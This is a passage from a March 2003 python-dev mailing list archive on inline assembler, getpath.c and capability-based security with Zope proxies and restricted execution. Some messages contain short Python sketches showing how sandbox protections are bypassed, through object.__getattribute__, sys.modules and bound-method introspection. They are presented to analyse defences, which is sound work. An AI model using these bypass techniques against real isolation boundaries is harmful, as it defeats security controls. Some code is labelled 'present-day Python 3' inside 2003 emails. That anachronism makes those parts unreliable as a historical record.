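print(p.get("a"))  # 1

try:
    p._target
except AttributeError:
    print("normal attribute access is blocked")

# The base type's slot ignores the override and reads the instance directly.
leaked = object.__getattribute__(p, "_target")
print(leaked)  # {'a': 1}
```

A proxy that is meant to be safe has to keep its target somewhere this
call cannot reach, which is one reason to implement it outside pure Python.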

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Sun Mar  9 03:41:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 08 Mar 2003 22:41:55 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <b4c9pk$4tu$1@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>

[Damien Morton]
> In the BINARY_ADD opcode, and in most arithmetic opcodes,

Aren't add and subtract the whole story here?

> there is a line that checks for overflow that looks like this:
>
> if ((i^a) < 0 && (i^b) < 0) goto slow_add;
>
> I got a small speedup by replacing this with a macro defined thusly:
>
> #if defined(_MSC_VER) and defined(_M_IX86)

"and" isn't C, so I assume you were very lucky <wink>.

> #define IF_OVERFLOW_GOTO(X) __asm { jo X };
> #else
> #define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
> #endif
>
> Would this case be an acceptable use of snippets of inline assembler?

If you had said "a huge speedup, on all programs", on the weak end of maybe.
"Small speedup" isn't worth the obscurity.  Note that Python contains no
assembler now.


From tismer@tismer.com  Sun Mar  9 04:16:24 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 09 Mar 2003 05:16:24 +0100
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
Message-ID: <3E6AC018.90007@tismer.com>

Tim Peters wrote:
> [Damien Morton]
> 
>>In the BINARY_ADD opcode, and in most arithmetic opcodes,
> 
> 
> Aren't add and subtract the whole story here?
> 
> 
>>there is a line that checks for overflow that looks like this:
>>
>>if ((i^a) < 0 && (i^b) < 0) goto slow_add;
>>
>>I got a small speedup by replacing this with a macro defined thusly:
>>
>>#if defined(_MSC_VER) and defined(_M_IX86)
> 
> 
> "and" isn't C, so I assume you were very lucky <wink>.
> 
> 
>>#define IF_OVERFLOW_GOTO(X) __asm { jo X };
>>#else
>>#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
>>#endif
>>
>>Would this case be an acceptable use of snippets of inline assembler?
> 
> 
> If you had said "a huge speedup, on all programs", on the weak end of maybe.
> "Small speedup" isn't worth the obscurity.  Note that Python contains no
> assembler now.

Just to add my 0.02 EUR.

You know that I'm not reluctant to use assembly for
platform specific speedups.
But first, I'm with Tim, not going this path for such
a small win.
Second, I'd like to point out that going to assembly
for such a huge function like eval_frame is rather
dangerous: All compilers have different ways of
handling the appearance of assembly. This is a dangerous
path, believe me:

MS C's behavior is one of the worst, which is the
reason why I was very careful to put this in a clean-room
for Stackless, for instance:
For the appearance of ASM code in some function, the
calling sequence and the optimization strategy are
changed drastically. Register allocation is changed,
the optimization level is reduced, and the calling
convention is *never* without stack frames.
This might not have changed eval_frame's behavior
too much, just because it is too big to benefit
from certain optimizations now, but I remember that
I changed it once to use about two registers less,
and I might re-apply these changes to give the eval loop
a boost of about 10 percent.
The existence of a single asm statement would
void this effect!

Hint: Write a small, understandable function twice,
once using assembly and once without. Compile the
stuff, and set the listing option to everything.
Then look at the .cod file, and wonder how different
the two versions are.
This will make you very reluctant to use any asm statement
at all, unless you want to re-write the whole function
in assembly, including the "naked" option.

Doing the latter for eval_frame would be worthwhile,
but then I'd suggest to do this as an external .asm
file. If you do this right, taking cache lines and
probabilities into account, you can for sure create
an overall gain of up to 20 percent.

But even this remarkable gain wouldn't be enough,
even for me, to go this hard path for a single platform.

sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From dmorton@bitfurnace.com  Sun Mar  9 05:00:09 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Sun, 9 Mar 2003 00:00:09 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net>
Message-ID: <000501c2e5f8$c384b6e0$6401a8c0@damien>

> -----Original Message-----
> From: Tim Peters [mailto:tim.one@comcast.net] 
> Sent: Saturday, 8 March 2003 22:42
> To: Damien Morton
> Cc: python-dev@python.org
> Subject: RE: [Python-Dev] acceptability of asm in python code?
> 
> 
> [Damien Morton]
> > In the BINARY_ADD opcode, and in most arithmetic opcodes,
> 
> Aren't add and subtract the whole story here?

ADD, SUBTRACT and INPLACE variants, yes. Potentially also MULTIPLY.
 
> > there is a line that checks for overflow that looks like this:
> >
> > if ((i^a) < 0 && (i^b) < 0) goto slow_add;
> >
> > I got a small speedup by replacing this with a macro defined thusly:
> >
> > #if defined(_MSC_VER) and defined(_M_IX86)
> 
> "and" isn't C, so I assume you were very lucky <wink>.

I had been using _MSC_VER, but decided to be a bit more specific for my
post. You're right, of course, the define I posted would not have worked.

> > #define IF_OVERFLOW_GOTO(X) __asm { jo X };
> > #else
> > #define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
> > #endif
> >
> > Would this case be an acceptable use of snippets of inline assembler?
> 
> If you had said "a huge speedup, on all programs", on the 
> weak end of maybe. "Small speedup" isn't worth the obscurity. 
>  Note that Python contains no assembler now.

It's arguable which is more obscure, the x86 assembly instruction "jo"
(jump if overflow), or the xor trickery in C. <wink>

I take your point, though, about there being no assembly in python now.


From cjohns@cybertec.com.au  Sun Mar  9 05:17:23 2003
From: cjohns@cybertec.com.au (Chris Johns)
Date: Sun, 09 Mar 2003 16:17:23 +1100
Subject: [Python-Dev] VERSION in getpath.c
Message-ID: <3E6ACE63.8080903@cybertec.com.au>

Hello,

First, I am new to Python so I hope this is the correct place to post this type 
of question.

I am playing with embedding Python 2.3a and I am trying to get importing to work. 
I have noticed the following in module_search_path :

  /tftpboot/lib/python21.zip
  /python/lib/python2.1/lib-dynload

The 2.1 comes from the VERSION label at the start of getpath.c. Should this be 
PACKAGE_VERSION ?


Regards

-- 
  Chris Johns, cjohns at cybertec.com.au


From eppstein@ics.uci.edu  Sun Mar  9 05:33:06 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sat, 08 Mar 2003 21:33:06 -0800
Subject: [Python-Dev] Re: acceptability of asm in python code?
References: <LNBBLJKPBEHFEDALKOLCCEMLEAAB.tim.one@comcast.net> <000501c2e5f8$c384b6e0$6401a8c0@damien>
Message-ID: <eppstein-A5A416.21330608032003@main.gmane.org>

In article <000501c2e5f8$c384b6e0$6401a8c0@damien>,
 "damien morton" <dmorton@bitfurnace.com> wrote:

> > If you had said "a huge speedup, on all programs", on the 
> > weak end of maybe. "Small speedup" isn't worth the obscurity. 
> >  Note that Python contains no assembler now.
> 
> It's arguable which is more obscure, the x86 assembly instruction "jo"
> (jump if overflow), or the xor trickery in C. <wink>
> 
> I take your point, though, about there being no assembly in python now.

The place to put this sort of low-level instruction optimization is in 
the peepholer of your C compiler.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science


From jim@zope.com  Sun Mar  9 11:01:18 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:01:18 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6B1EFE.4060500@zope.com>

Guido van Rossum wrote:
> [Moving a discussion about capabilities to where it arguably belongs]

Thanks Guido. I'll respond to Ben here.

> [Ben Laurie]
> 
>>The point about capabilities is that mere possession of a capability is 
>>all that is required to exercise it. If you start adding security 
>>checkers to them, then you don't have capabilities anymore.

Right. Jeremy keeps reminding me of this point. Zope 3 uses proxies
in a way that doesn't conform to this definition. Zope proxies
proxy an object to be protected *and* a policy object called a "checker".
The checkers used in Zope perform checks at access time.  One could,
instead, perform the checks when the proxies are created or earlier
and use checkers that simply allowed some names or operations and not
others. IOW, you could certainly implement a strict capability model
with Zope proxies.

...

>>BTW, if you would like to explain why you don't think bound methods are 
>>the way to go on python-dev, I'd love to hear it.

I'll give an answer similar to Guido's but with a different emphasis.

I'm an object zealot. :) I like working with object oriented systems.  I don't
want to lose that and, thus, I don't want computation to be reduced to passing
around basic values and functions.  I want to be able to pass around objects
with interfaces.  Zope proxies make it easy to define a capability
in terms of an interface. I think this is really important for
object-oriented systems.

Another feature of Zope proxies that I think is important is that they
automate creation of proxies. When you get an attribute from a proxy,
the value is proxied. (Actually, the checker decides whether the value
is proxied. Zope checkers proxy all objects except basic objects such
as numbers, strings, and None.) When you perform an operation on a proxied
object, the result is proxied.  This means that the code being proxied doesn't
have to be aware of proxies, capabilities, or a security model.

Note that when you access a method on a proxied object, the method itself is
proxied. All you can do with a proxied method is call it, get its name, and
convert it to a string. This is true even if the proxied method is passed to
unrestricted code.
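
The behaviour described above can be sketched in a few lines of Python. This
is only a toy under stated assumptions: the names Proxy, wrap, ALLOWED and
ForbiddenAttribute are invented here and are not the Zope API, and a
pure-Python proxy cannot really hide its target (proxy._target is reachable),
which is presumably one reason the real thing lives in C.

```python
BASIC_TYPES = (int, float, complex, str, bytes, type(None))


class ForbiddenAttribute(Exception):
    """Raised when the checker does not permit a name."""


# Hypothetical registry: type -> names that may be read through a proxy.
ALLOWED = {}


def wrap(value):
    """Proxy a value unless it is a basic object (number, string, None)."""
    if isinstance(value, BASIC_TYPES):
        return value
    # Types without an entry get an empty name set: they can only be called.
    return Proxy(value, ALLOWED.get(type(value), frozenset()))


class Proxy:
    __slots__ = ("_target", "_names")

    def __init__(self, target, names):
        self._target = target
        self._names = names

    def __getattr__(self, name):
        # Only reached for names that are not real attributes of Proxy.
        if name not in self._names:
            raise ForbiddenAttribute(name)
        return wrap(getattr(self._target, name))

    def __call__(self, *args, **kwargs):
        # Results of operations are proxied too.
        return wrap(self._target(*args, **kwargs))


class Account:
    def __init__(self, owner, balance):
        self.owner = owner
        self.balance = balance

    def deposit(self, amount):
        self.balance += amount
        return self


ALLOWED[Account] = frozenset(["balance", "deposit"])
acct = wrap(Account("jim", 10))
```

Here acct.balance comes back as a plain number, acct.deposit comes back as a
proxy that can be called but not inspected, and acct.owner is refused. Note
that Account itself knows nothing about proxies.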

I agree that we all need restricted execution to work better than it does
now.  I was hoping that we could collaborate at a higher level as well.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Sun Mar  9 11:13:59 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:13:59 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6B21F7.3040300@zope.com>

Jeremy Hylton wrote:
> On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> 
>>Bound methods are not capabilities unless they are secured. It seems the 
>>correct way to do this is to use restricted execution, and perhaps some 
>>other tricks. What I am trying to nail down is exactly what needs doing 
>>to get us from where we are now to where capabilities actually work. As 
>>I understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
>>
>>b) Override import, open (and other stuff? what?)
>>
>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
>>
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.
> 
> Any security scheme needs some kind of information hiding to guarantee
> that untrusted code does not break into the representation of an object,
> so that, for example, an object can be used as a capability.  I think
> we've discussed two different ways to implement information hiding.
> 
> The rexec approach is to add code to the interpreter to disable certain
> introspection features when running untrusted code.
> 
> The proxy approach is to wrap protected objects in proxies before
> passing them to untrusted code.
> 
> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can do introspection on objects.  The proxy approach is to create an
> object that specifically disables introspection by not exposing
> internals to the core.  We need to do some more careful analysis to be
> sure that proxies really achieve the goal of information hiding.
> 
> I think another benefit of proxies vs. rexec is that untrusted code can
> still use all of the standard introspection features when dealing with
> objects it creates itself.  Code running in rexec can't use any
> introspective feature, period, because all those features are disabled. 
> With the proxy approach, introspection is only disabled on protected
> objects.

These are all good points.

Proxies have a dark side though.  They sometimes trip up standard facilities
in Python that either depend on specific types or on identity comparisons.
With a bit of effort, proxies can be made highly transparent, but they change
an object's type and id.  For example, you can't proxy exceptions without
breaking exception handling. In Zope, we rely on restricted execution to prevent
certain kinds of introspection on exceptions and exception classes.  In Zope, we
also don't proxy None, because None is usually checked for identity. We also don't
proxy strings and numbers.

I think I agree that you could build a restricted environment with proxies alone, but,
to do so, you would need to make Python far more proxy aware.  I think that the
language would need to be aware of proxies at a far deeper level.
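
The type and identity problems mentioned above are easy to reproduce. The
following is a minimal sketch in present-day Python 3, not Zope code; the
Proxy class, Config, describe and try_raise are all invented for the
illustration.

```python
class Proxy:
    """Toy transparent proxy: forwards attribute reads to the wrapped object."""

    def __init__(self, target):
        self._target = target

    def __getattr__(self, name):
        return getattr(self._target, name)


class Config:
    debug = True


def describe(value):
    """Ordinary library-style code that relies on identity and exact type."""
    if value is None:
        return "missing"
    if type(value) is Config:
        return "config"
    return "something else"


def try_raise(obj):
    """Raise obj and report the class name of what was actually caught."""
    try:
        raise obj
    except BaseException as caught:
        return type(caught).__name__


cfg = Config()
p = Proxy(cfg)
```

Attribute access is transparent (p.debug works), but describe() no longer
recognises the proxied Config or a proxied None, and raising a proxied
exception produces a TypeError instead of the wrapped exception.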

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Sun Mar  9 11:29:15 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 09 Mar 2003 06:29:15 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <3E68AAF4.3060508@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com>	 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>	 <15933.30607.900530.370402@localhost.localdomain>	 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk>
Message-ID: <3E6B258B.2080207@zope.com>

Ben Laurie wrote:
> Jeremy Hylton wrote:
> 
...

> And in either case, you also need to restrict access to the underlying 
> libraries and (presumably) some of the builtin functions?

You don't need restricted execution to make proxies work.  In Zope,
we choose to use restricted execution in cases where proxies don't
work well. (For example, as I mentioned in another note, we can't
currently proxy exceptions.)

> BTW, Guido pointed out to me that I'm causing confusion by saying 
> "rexec" when I really mean "restricted execution".

Right. I think that there is some confusion floating around wrt proxies
(not your fault :) ...

> In short, it seems to me that proxies and capabilities via bound methods 
> both do the same basic thing: i.e. prevent inspection of what is behind 
> the capability/proxy. Proxies add access control to decide whether you 
> get to use them or not, whereas in a capability system simple possession 
> of the capability is sufficient (i.e. they are like a proxy where the 
> security check always says "yes"). You do access control using 
> capabilities, instead of inside them.
> 
> Am I not understanding proxies?

You are understanding proxies as they are *applied* in Zope.
This is understandable, since the information I sent you:

   http://cvs.zope.org/Zope3/src/zope/security/readme.txt?rev=HEAD&content-type=text/vnd.viewcvs-markup

talks more about the higher-level application of proxies in Zope than
about the basic proxy features.

Really, Zope proxies are on about the same level as bound methods.
They are a lower-level abstraction than capabilities.  You could
use them to implement capabilities or you could use them to implement
a different approach, as we have done in Zope.

As I mentioned in another note, I think proxies provide a better way
to implement capabilities than bound methods because they provide access
to objects with whole interfaces, rather than just individual functions or
methods.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Sun Mar  9 11:30:09 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 9 Mar 2003 12:30:09 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com>
Message-ID: <011f01c2e62f$3e6d5840$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> For example, you can't proxy exceptions without
> breaking exception handling. In Zope, we rely on restricted execution to
> prevent certain kinds of introspection on exceptions and exception classes.
> In Zope, we also don't proxy None, because None is usually checked for
> identity. We also don't proxy strings and numbers.
>
That was a question I was asking myself about proxies: exception handling.
But I never had the time to play with it to check.

Does that mean that restricted code can get unproxied instances of classic
classes as caught exceptions?


From guido@python.org  Sun Mar  9 11:40:27 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 06:40:27 -0500
Subject: [Python-Dev] VERSION in getpath.c
In-Reply-To: "Your message of Sun, 09 Mar 2003 16:17:23 +1100."
 <3E6ACE63.8080903@cybertec.com.au>
References: <3E6ACE63.8080903@cybertec.com.au>
Message-ID: <200303091140.h29BeRO04633@pcp02138704pcs.reston01.va.comcast.net>

> First, I am new to Python so I hope this is the correct place to
> post this type of question.

It's not, but you're forgiven.

> I am playing with embedding Python 2.3a and I am trying to get
> importing to work. I have noticed the following in
> module_search_path :
> 
>   /tftpboot/lib/python21.zip
>   /python/lib/python2.1/lib-dynload
> 
> The 2.1 comes from the VERSION label at the start of
> getpath.c. Should this be PACKAGE_VERSION ?

No, if you look in the Makefile the VERSION variable is passed in from
the Makefile to the compilation of getpath.c (only), so that you can
override it (and a few other parameters) from the Makefile command
line.
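
To illustrate how one version string supplied at build time ends up in both
of the entries quoted above, here is a small Python sketch. It only mirrors
the two path patterns shown in this thread; the function name and parameters
are assumptions for illustration, not the actual getpath.c logic.

```python
def search_path_entries(prefix, exec_prefix, version):
    """Build the two entries quoted in the thread from a 'major.minor' string."""
    major, minor = version.split(".")[:2]
    return [
        # The zip archive name uses the digits without the dot.
        "%s/lib/python%s%s.zip" % (prefix, major, minor),
        # The extension-module directory uses the dotted version.
        "%s/lib/python%s/lib-dynload" % (exec_prefix, version),
    ]


# The prefixes below are the ones that appear in the quoted search path.
as_reported = search_path_entries("/tftpboot", "/python", "2.1")
overridden = search_path_entries("/tftpboot", "/python", "2.3")
```

Changing only the version argument changes both entries together, which is
the effect of overriding VERSION from the Makefile command line.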

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 12:03:18 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 07:03:18 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: "Your message of Sun, 09 Mar 2003 06:29:15 EST."
 <3E6B258B.2080207@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
Message-ID: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>

[Jim]
> You don't need restricted execution to make proxies work.

Um, I think that's a dangerous mistake, or a confusion in terminology.

Without restricted execution, untrusted code would have access to
sys.modules, and from there it would be able to access
removeAllProxies.
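
A minimal sketch of the problem, in present-day Python 3. The module
toy_proxy_lib and its functions are stand-ins invented for this example (they
are not Zope's), but the route through sys.modules is the one described
above.

```python
import sys
import types

# Stand-in for a proxy library that has already been imported by trusted code.
toy = types.ModuleType("toy_proxy_lib")
_hidden = {}


class Opaque:
    """A handle with no attributes of its own."""
    __slots__ = ()


def _proxy(target):
    token = Opaque()
    _hidden[id(token)] = (token, target)  # keep the token alive alongside its target
    return token


def _remove_all_proxies(token):
    return _hidden[id(token)][1]


toy.proxy = _proxy
toy.remove_all_proxies = _remove_all_proxies
sys.modules["toy_proxy_lib"] = toy


def untrusted(handle):
    """Code that was only handed the opaque handle, with nothing restricting it."""
    import sys
    lib = sys.modules["toy_proxy_lib"]
    return lib.remove_all_proxies(handle)


secret = {"password": "hunter2"}
handle = toy.proxy(secret)
```

The handle itself reveals nothing, yet untrusted(handle) returns the original
object, because nothing stops the code from looking up the unwrapping
function.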

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar  9 12:06:31 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 07:06:31 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: "Your message of Sun, 09 Mar 2003 06:29:15 EST."
 <3E6B258B.2080207@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
Message-ID: <200303091206.h29C6VI04752@pcp02138704pcs.reston01.va.comcast.net>

> Really, Zope proxies are on about the same level as bound methods.

Another difference is that proxies were *designed* for securing off
all access.  Bound methods have introspection facilities which allow
you to go around them.  Restricted execution tries to fence off those
introspection facilities, but there may be a hole in the fence.
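
For example (a sketch in present-day Python 3, where the attribute is spelled
__self__; in the Python of this thread it was im_self), anyone holding a
bound method can walk back to the instance behind it. Vault and snoop are
names made up for the illustration.

```python
class Vault:
    def __init__(self, combination):
        self._combination = combination

    def is_open(self):
        return False


vault = Vault("12-34-56")
capability = vault.is_open  # intended to grant only "ask whether it is open"


def snoop(method):
    """Unrestricted code recovers the whole object from the bound method."""
    return method.__self__._combination
```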

--Guido van Rossum (home page: http://www.python.org/~guido/)


From zooko@zooko.com  Sun Mar  9 12:40:23 2003
From: zooko@zooko.com (Zooko)
Date: Sun, 09 Mar 2003 07:40:23 -0500
Subject: [Python-Dev] Re: Capabilities
Message-ID: <E18s06J-0006ZD-00@localhost>

To enforce capability access control, a language requires three things:

1.  Pointer-safety.  (There must not be a function available which performs the 
inverse of id().)  Python has pointer-safety (unless a 3rd party native 
extension module has been executed).

2.  Mandatory private data (accessible only by the object itself).  Normal 
Python doesn't have mandatory private data.  If I understand correctly, both 
rexec and proxies (attempt to) provide this.  They also attempt to provide 
another safety feature: a wrapper around the standard library and builtins that 
turns off access to dangerous features according to an overridable security 
policy.

3.  A standard library that follows the Principle of Least Privilege.  That is, 
a library full of tools that you can extend to an object in order to empower it 
to do specific things (e.g. __builtin__.abs(), os.times(), ...) without thereby 
also empowering it to do other things (e.g. __builtin__.file(), os.system(), 
...).  Python doesn't have such a library.

Now the Principle of Least Privilege approach to making a library safe is very 
different from the "sandbox" approach.  The latter is to remove all "dangerous" 
tools from the toolbox (or in our case, to have them dynamically disabled by the 
"restricted" bit which is determined by an overridable policy).  The former is 
to separate the tools so that dangerous ones don't come tied together with 
common ones.  The security policy, then, is expressed by code that grants or 
withholds capabilities (== references) rather than by code that toggles the 
"restricted" bit.

Of course, you can start by denying the entire standard library to restricted 
code, and then incrementally refactor the library or wrap it in Least-Privilege 
wrappers.

Until you have a substantial Least-Privilege-respecting library you can't gain 
the big benefit of capabilities -- code which is capable of doing something 
useful without also being capable of doing harm.  (You can gain the "sandbox" 
style of security -- code which is incapable of doing anything useful or 
harmful.)

This requirement also means that there can be no "ambient authority" -- 
authority that an object receives even if its creator has given it no 
references.
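
As a rough illustration of point 3, here is a Python 3 sketch in which the
security policy is expressed by which reference gets handed over. The names
make_reader and count_words are invented for this example. Python does not
enforce any of this today: count_words could still import os itself, which is
exactly the ambient authority described above, and the sketch does not guard
against symlinks inside the directory.

```python
import os
import tempfile


def make_reader(directory):
    """Return a capability that reads files directly inside `directory` only."""
    root = os.path.realpath(directory)

    def read_text(name):
        # Accept plain file names only, so the caller cannot climb out of root.
        if os.path.basename(name) != name or name in ("", ".", ".."):
            raise ValueError("not a plain file name: %r" % (name,))
        with open(os.path.join(root, name)) as f:
            return f.read()

    return read_text


def count_words(read_text, name):
    """Useful work done with nothing but the capability it was given."""
    return len(read_text(name).split())


with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "note.txt"), "w") as f:
        f.write("least privilege wins")
    reader = make_reader(d)
    words = count_words(reader, "note.txt")
    try:
        reader("../outside.txt")
        escaped = True
    except ValueError:
        escaped = False
```

The contrast with the sandbox style is that nothing is switched off globally;
count_words is simply never given file() or os.system() in the first place.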

Regards,

Zooko

P.S.  I learned this three-part paradigm from Mark Miller whose paper with Chip 
Morningstar and Bill Frantz articulates it in more detail:

http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop


From zooko@zooko.com  Sun Mar  9 12:48:31 2003
From: zooko@zooko.com (Zooko)
Date: Sun, 09 Mar 2003 07:48:31 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Zooko <zooko@zooko.com>
 of "Sun, 09 Mar 2003 07:40:23 EST."
Message-ID: <E18s0EB-0006la-00@localhost>

Following-up to my own post in order to apologize for contributing to the 
tradition of confusing restricted execution with rexec.

 I, Zooko, wrote:
>
> 2.  Mandatory private data (accessible only by the object itself).  Normal 
> Python doesn't have mandatory private data.  If I understand correctly, both 
> rexec and proxies (attempt to) provide this.  They also attempt to provide 
> another safety feature: a wrapper around the standard library and builtins that 
> turns off access to dangerous features according to an overridable security 
> policy.

Perhaps it is that "restricted execution" is designed to provide private data, 
by disabling certain introspection features, and "rexec" and "proxies" are 
designed to provide the wrapper feature?

Regards,

Zooko


From ben@algroup.co.uk  Sun Mar  9 12:45:39 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Sun, 09 Mar 2003 12:45:39 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6B3773.7070600@algroup.co.uk>

Jeremy Hylton wrote:
> On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
> 
>>Bound methods are not capabilities unless they are secured. It seems the 
>>correct way to do this is to use restricted execution, and perhaps some 
>>other tricks. What I am trying to nail down is exactly what needs doing 
>>to get us from where we are now to where capabilities actually work. As 
>>I understand it, what is needed is:
>>
>>a) Fix restricted execution, which is in a state of disrepair
>>
>>b) Override import, open (and other stuff? what?)
>>
>>c) Wrap or replace some of the existing libraries, certify that others 
>>are "safe"
>>
>>It looks to me like a and b are shared with proxies, and c would be 
>>different, by definition. Is there anything else? Am I on the wrong track?
> 
> 
> I have been trying to argue, though I feel a bit muddled at times, that
> the proxy approach eliminates the need for rexec and makes it possible
> to build a "restricted environment" without relying on the rexec code in
> the interpreter.

Wouldn't that suggest that the way to fix restricted execution is to do 
something proxylike, then?

> Any security scheme needs some kind of information hiding to guarantee
> that untrusted code does not break into the representation of an object,
> so that, for example, an object can be used as a capability.  I think
> we've discussed two different ways to implement information hiding.

Yes.

> The rexec approach is to add code to the interpreter to disable certain
> introspection features when running untrusted code.
> 
> The proxy approach is to wrap protected objects in proxies before
> passing them to untrusted code.

Again, this suggests to me that perhaps restricted execution should also 
use wrapping. I guess I will study this idea in more detail when I start 
writing.

> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can do introspection on objects.  The proxy approach is to create an
> object that specifically disables introspection by not exposing
> internals to the core.  We need to do some more careful analysis to be
> sure that proxies really achieve the goal of information hiding.

If restricted execution were implemented in the same way, then proxies 
and restricted execution would both benefit from this analysis.

> I think another benefit of proxies vs. rexec is that untrusted code can
> still use all of the standard introspection features when dealing with
> objects it creates itself.  Code running in rexec can't use any
> introspective feature, period, because all those features are disabled. 
> With the proxy approach, introspection is only disabled on protected
> objects.

Right - this does seem like a desirable feature.

>>I am going to write this all up into a document which can be used as a 
>>starting point for work to complete this.
> 
> It sounds like a PEP would be the right thing.  It would be nice if the
> PEP could explain the rationale for a secure Python environment and then
> develop (at least) the capability approach to building that
> environment.  Perhaps I could chip in with some explanation of the proxy
> approach.

That would be excellent! I will write a draft as specified in PEP 1.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From skip@manatee.mojam.com  Sun Mar  9 13:00:22 2003
From: skip@manatee.mojam.com (Skip Montanaro)
